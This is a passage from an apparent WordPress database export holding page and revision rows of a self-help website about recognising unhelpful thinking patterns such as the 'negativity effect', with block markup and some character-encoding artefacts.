is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'publish', 'closed', 'closed', '', 'negativity-effect', '', '', '2023-08-06 15:50:36', '2023-08-06 15:50:36', '', 0, 'https://www.happythinking.com/?page_id=1616', 0, 'page', '', 0),
(1956, 1, '2023-06-24 07:15:00', '2023-06-24 07:15:00', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-24 07:15:00', '2023-06-24 07:15:00', '', 88, 'https://www.happythinking.com/?p=1956', 0, 'revision', '', 0),
(2044, 1, '2023-08-06 15:39:47', '2023-08-06 15:39:47', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2035,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron210623.jpg" alt="" class="wp-image-2035"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-06 15:39:47', '2023-08-06 15:39:47', '', 88, 'https://www.happythinking.com/?p=2044', 0, 'revision', '', 0),
(1617, 1, '2023-05-30 17:32:03', '2023-05-30 17:32:03', '<!-- wp:paragraph -->\n<p>As mentioned in the introduction, an important aspect of Happy Thinking is about recognising unhelpful thinking. In this section, I will tell you a bit more about unhelpful thinking, and this will be followed, in the subsequent web pages, by descriptions of common types of such thinking. Ultimately, this should help you recognise unhelpful thinking when it happens to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-05-30 17:32:03', '2023-05-30 17:32:03', '', 1616, 'https://www.happythinking.com/?p=1617', 0, 'revision', '', 0),
(1618, 1, '2023-05-30 17:33:17', '2023-05-30 17:33:17', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various unhelpful thinking patterns, by discussing one that psychologists call the â€œnegativity effectâ€. This is a common type of unhelpful thinking and is a very important one to understand as it may, in some, contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day to day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone). Unfortunately, oneâ€™s mind may develop an unhelpful thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus almost fully on the lost mobile phone, while ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking is unhelpful because it makes the situation worse than it needs to be, as when one minimises positive events, they donâ€™t help to reduce the emotional impact of negative events. A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in a â€œnegativity effectâ€ type unhelpful thinking pattern. This tendency may have been inherited from our ancestors from many thousands of years ago, when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of unhelpful thinking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when you do the negativity effect type of unhelpful thinking. As I mentioned before, Happy Thinking is about dealing with such unhelpful thinking. Once we have gone over the common types of unhelpful thinking, I will share with you some tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-05-30 17:33:17', '2023-05-30 17:33:17', '', 1616, 'https://www.happythinking.com/?p=1618', 0, 'revision', '', 0),
(2084, 1, '2023-08-12 17:42:43', '2023-08-12 17:42:43', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call, â€unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various mental tools that you can use to change unhelpful thinking. Just like a repairman will use various tools to repair something, you will be able to use these tools to change your unhelpful thinking. These â€œtoolsâ€ are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones apply to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental tools that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":2083} /-->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-08-12 17:42:43', '2023-08-12 17:42:43', '', 1034, 'https://www.happythinking.com/?p=2084', 0, 'revision', '', 0),
(2046, 1, '2023-08-06 15:44:30', '2023-08-06 15:44:30', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call,â€ unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none actually exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various mental tools that you can use to change unhelpful thinking. Just like a repairman will use various tools to repair something, you will be able to use these tools to change your unhelpful thinking. These â€œtoolsâ€ are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones are applicable to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental tools that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-08-06 15:44:30', '2023-08-06 15:44:30', '', 1034, 'https://www.happythinking.com/?p=2046', 0, 'revision', '', 0),
